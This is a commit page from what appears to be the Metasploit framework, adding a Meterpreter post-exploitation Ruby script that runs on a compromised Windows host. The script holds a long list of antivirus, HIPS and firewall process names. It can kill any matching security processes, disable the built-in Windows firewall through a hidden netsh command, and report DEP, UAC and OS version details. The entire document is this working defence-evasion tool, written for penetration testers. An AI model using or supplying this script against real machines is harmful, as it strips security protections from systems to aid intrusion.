getcountermeasure.rb script from Carlos Perez (detect/disable AV/HIPS/FWs/etc)
git-svn-id: file:///home/svn/framework3/trunk@6390 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
970d30cd45
commit
5f5dfbf823
|
@ -0,0 +1,426 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
#Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration.
|
||||
#Provides also the option to kill the processes of detected products and disable the built-in firewall.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.0
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-k" => [ false, "Kill any AV, HIPS and Third Party Firewall process found." ],
|
||||
"-d" => [ false, "Disable built in Firewall"]
|
||||
|
||||
)
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
avs = %W{
|
||||
a2adguard.exe
|
||||
a2adwizard.exe
|
||||
a2antidialer.exe
|
||||
a2cfg.exe
|
||||
a2cmd.exe
|
||||
a2free.exe
|
||||
a2guard.exe
|
||||
a2hijackfree.exe
|
||||
a2scan.exe
|
||||
a2service.exe
|
||||
a2start.exe
|
||||
a2sys.exe
|
||||
a2upd.exe
|
||||
aavgapi.exe
|
||||
aawservice.exe
|
||||
aawtray.exe
|
||||
ad-aware.exe
|
||||
ad-watch.exe
|
||||
alescan.exe
|
||||
anvir.exe
|
||||
ashdisp.exe
|
||||
ashmaisv.exe
|
||||
ashserv.exe
|
||||
ashwebsv.exe
|
||||
aswupdsv.exe
|
||||
atrack.exe
|
||||
avgagent.exe
|
||||
avgamsvr.exe
|
||||
avgcc.exe
|
||||
avgctrl.exe
|
||||
avgemc.exe
|
||||
avgnt.exe
|
||||
avgtcpsv.exe
|
||||
avguard.exe
|
||||
avgupsvc.exe
|
||||
avgw.exe
|
||||
avkbar.exe
|
||||
avk.exe
|
||||
avkpop.exe
|
||||
avkproxy.exe
|
||||
avkservice.exe
|
||||
avktray
|
||||
avktray.exe
|
||||
avkwctl
|
||||
avkwctl.exe
|
||||
avmailc.exe
|
||||
avp.exe
|
||||
avpm.exe
|
||||
avpmwrap.exe
|
||||
avsched32.exe
|
||||
avwebgrd.exe
|
||||
avwin.exe
|
||||
avwupsrv.exe
|
||||
avz.exe
|
||||
bdagent.exe
|
||||
bdmcon.exe
|
||||
bdnagent.exe
|
||||
bdss.exe
|
||||
bdswitch.exe
|
||||
blackd.exe
|
||||
blackice.exe
|
||||
blink.exe
|
||||
boc412.exe
|
||||
boc425.exe
|
||||
bocore.exe
|
||||
bootwarn.exe
|
||||
cavrid.exe
|
||||
cavtray.exe
|
||||
ccapp.exe
|
||||
ccevtmgr.exe
|
||||
ccimscan.exe
|
||||
ccproxy.exe
|
||||
ccpwdsvc.exe
|
||||
ccpxysvc.exe
|
||||
ccsetmgr.exe
|
||||
cfgwiz.exe
|
||||
cfp.exe
|
||||
clamd.exe
|
||||
clamservice.exe
|
||||
clamtray.exe
|
||||
cmdagent.exe
|
||||
cpd.exe
|
||||
cpf.exe
|
||||
csinsmnt.exe
|
||||
dcsuserprot.exe
|
||||
defensewall.exe
|
||||
defensewall_serv.exe
|
||||
defwatch.exe
|
||||
f-agnt95.exe
|
||||
fpavupdm.exe
|
||||
f-prot95.exe
|
||||
f-prot.exe
|
||||
fprot.exe
|
||||
fsaua.exe
|
||||
fsav32.exe
|
||||
f-sched.exe
|
||||
fsdfwd.exe
|
||||
fsm32.exe
|
||||
fsma32.exe
|
||||
fssm32.exe
|
||||
f-stopw.exe
|
||||
f-stopw.exe
|
||||
fwservice.exe
|
||||
fwsrv.exe
|
||||
iamstats.exe
|
||||
iao.exe
|
||||
icload95.exe
|
||||
icmon.exe
|
||||
idsinst.exe
|
||||
idslu.exe
|
||||
inetupd.exe
|
||||
irsetup.exe
|
||||
isafe.exe
|
||||
isignup.exe
|
||||
issvc.exe
|
||||
kav.exe
|
||||
kavss.exe
|
||||
kavsvc.exe
|
||||
klswd.exe
|
||||
kpf4gui.exe
|
||||
kpf4ss.exe
|
||||
livesrv.exe
|
||||
lpfw.exe
|
||||
mcagent.exe
|
||||
mcdetect.exe
|
||||
mcmnhdlr.exe
|
||||
mcrdsvc.exe
|
||||
mcshield.exe
|
||||
mctskshd.exe
|
||||
mcvsshld.exe
|
||||
mghtml.exe
|
||||
mpftray.exe
|
||||
msascui.exe
|
||||
mscifapp.exe
|
||||
msfwsvc.exe
|
||||
msgsys.exe
|
||||
msssrv.exe
|
||||
navapsvc.exe
|
||||
navapw32.exe
|
||||
navlogon.dll
|
||||
navstub.exe
|
||||
navw32.exe
|
||||
nisemsvr.exe
|
||||
nisum.exe
|
||||
nmain.exe
|
||||
noads.exe
|
||||
nod32krn.exe
|
||||
nod32kui.exe
|
||||
nod32ra.exe
|
||||
npfmntor.exe
|
||||
nprotect.exe
|
||||
nsmdtr.exe
|
||||
oasclnt.exe
|
||||
ofcdog.exe
|
||||
opscan.exe
|
||||
outpost.exe
|
||||
paamsrv.exe
|
||||
pavfnsvr.exe
|
||||
pcclient.exe
|
||||
pccpfw.exe
|
||||
pccwin98.exe
|
||||
persfw.exe
|
||||
protector.exe
|
||||
qconsole.exe
|
||||
qdcsfs.exe
|
||||
rtvscan.exe
|
||||
sadblock.exe
|
||||
safe.exe
|
||||
sandboxieserver.exe
|
||||
savscan.exe
|
||||
sbiectrl.exe
|
||||
sbiesvc.exe
|
||||
sbserv.exe
|
||||
scfservice.exe
|
||||
sched.exe
|
||||
schedm.exe
|
||||
scheduler daemon.exe
|
||||
sdhelp.exe
|
||||
serv95.exe
|
||||
sgbhp.exe
|
||||
sgmain.exe
|
||||
slee503.exe
|
||||
smartfix.exe
|
||||
smc.exe
|
||||
snoopfreesvc.exe
|
||||
snoopfreeui.exe
|
||||
spbbcsvc.exe
|
||||
sp_rsser.exe
|
||||
spyblocker.exe
|
||||
spybotsd.exe
|
||||
spysweeper.exe
|
||||
spysweeperui.exe
|
||||
spywareguard.dll
|
||||
spywareterminatorshield.exe
|
||||
ssu.exe
|
||||
steganos5.exe
|
||||
stinger.exe
|
||||
swdoctor.exe
|
||||
swupdate.exe
|
||||
symlcsvc.exe
|
||||
symundo.exe
|
||||
symwsc.exe
|
||||
symwscno.exe
|
||||
tcguard.exe
|
||||
tds2-98.exe
|
||||
tds-3.exe
|
||||
teatimer.exe
|
||||
tgbbob.exe
|
||||
tgbstarter.exe
|
||||
tsatudt.exe
|
||||
umxagent.exe
|
||||
umxcfg.exe
|
||||
umxfwhlp.exe
|
||||
umxlu.exe
|
||||
umxpol.exe
|
||||
umxtray.exe
|
||||
usrprmpt.exe
|
||||
vetmsg9x.exe
|
||||
vetmsg.exe
|
||||
vptray.exe
|
||||
vsaccess.exe
|
||||
vsserv.exe
|
||||
wcantispy.exe
|
||||
win-bugsfix.exe
|
||||
winpatrol.exe
|
||||
winpatrolex.exe
|
||||
wrsssdk.exe
|
||||
xcommsvr.exe
|
||||
xfr.exe
|
||||
xp-antispy.exe
|
||||
zegarynka.exe
|
||||
zlclient.exe
|
||||
}
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
#Function for checking for the presence of AV, HIPS and Third Party Firewalls and/or kill the processes associated to it
|
||||
def check(session,avs,killbit)
|
||||
print_status("Checking for contermeasures...")
|
||||
client.sys.process.get_processes().each do |x|
|
||||
if (avs.index(x['name'].downcase))
|
||||
print_status("\tPossible countermeasure found #{x['name']} #{x['path']}")
|
||||
if (killbit == 1)
|
||||
print_status("\tKilling process for countermeasure.....")
|
||||
session.sys.process.kill(x['pid'])
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
#Function for getting the configuration and/or disabling the built in Windows Firewall
|
||||
def checklocalfw(session,killfw)
|
||||
# Expand enviroment %TEMP% variable
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
# Create random name for the netsh output
|
||||
fwfile = sprintf("%.5d",rand(100000))
|
||||
fwout = "#{tmp}\\#{fwfile}"
|
||||
print_status("Getting Windows Built in Firewall configuration...")
|
||||
opmode = ""
|
||||
r = session.sys.process.execute("cmd.exe /c netsh firewall show opmode >> #{fwout}", nil, {'Hidden' => 'true'})
|
||||
sleep(2)
|
||||
r = session.sys.process.execute("cmd.exe /c type #{fwout}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
opmode << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
opmode.split("\n").each do |o|
|
||||
print_status("\t#{o}")
|
||||
end
|
||||
if (killfw == 1)
|
||||
print_status("Disabling Built in Firewall.....")
|
||||
f = session.sys.process.execute("cmd.exe /c netsh firewall set opmode mode=DISABLE", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = f.channel.read)
|
||||
if d =~ /The requested operation requires elevation./
|
||||
print_status("\tUAC or Insufficient permissions prevented the disabling of Firewal")
|
||||
end
|
||||
end
|
||||
f.channel.close
|
||||
f.close
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
# Function for getting the current DEP Policy on the Windows Target
|
||||
def checkdep(session)
|
||||
tmpout = ""
|
||||
depmode = ""
|
||||
# Expand enviroment %TEMP% variable
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
# Create random name for the wmic output
|
||||
wmicfile = sprintf("%.5d",rand(100000))
|
||||
wmicout = "#{tmp}\\#{wmicfile}"
|
||||
print_status("Checking DEP Support Policy...")
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicout} OS Get DataExecutionPrevention_SupportPolicy", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
r.close
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmicout}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
session.sys.process.execute("cmd.exe /c del #{wmicout}", nil, {'Hidden' => true})
|
||||
depmode = tmpout.scan(/(\d)/)
|
||||
if depmode.to_s == "0"
|
||||
print_status("\tDEP is off for the whole system.")
|
||||
elsif depmode.to_s == "1"
|
||||
print_status("\tFull DEP coverage for the whole system with no exceptions.")
|
||||
elsif depmode.to_s == "2"
|
||||
print_status("\tDEP is limited to Windows system binaries.")
|
||||
elsif depmode.to_s == "3"
|
||||
print_status("\tDEP is on for all programs and services.")
|
||||
end
|
||||
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def checkuac(session)
|
||||
print_status("Checking if UAC is enaled ...")
|
||||
key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\System'
|
||||
root_key, base_key = session.sys.registry.splitkey(key)
|
||||
value = "EnableLUA"
|
||||
open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
|
||||
v = open_key.query_value(value)
|
||||
if v.data == 1
|
||||
print_status("\tUAC is Enabled")
|
||||
else
|
||||
print_status("\tUAC is Disabled")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
#Function for identifying the version of windows
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
# Read the output file of the wmic commands
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ /Windows Serverr 2008/
|
||||
version = "Windows 2008"
|
||||
elsif d =~ /Windows Vista/
|
||||
version = "Windows Vista"
|
||||
end
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
killbt = 0
|
||||
killfw = 0
|
||||
hlp = 0
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
|
||||
when "-k"
|
||||
killbt = 1
|
||||
when "-d"
|
||||
killfw = 1
|
||||
when "-h"
|
||||
hlp = 1
|
||||
print(
|
||||
"Getcountermeasure Meterpreter Script\n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
break
|
||||
|
||||
end
|
||||
|
||||
}
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
#get the version of windows
|
||||
wnvr = winver(session)
|
||||
if (hlp == 0)
|
||||
print_status("Running Getcountermeasure on the target...")
|
||||
check(session,avs,killbt)
|
||||
if not wnvr == "Windows 2000"
|
||||
checklocalfw(session,killfw)
|
||||
checkdep(session)
|
||||
end
|
||||
if wnvr == "Windows Vista"
|
||||
checkuac(session)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue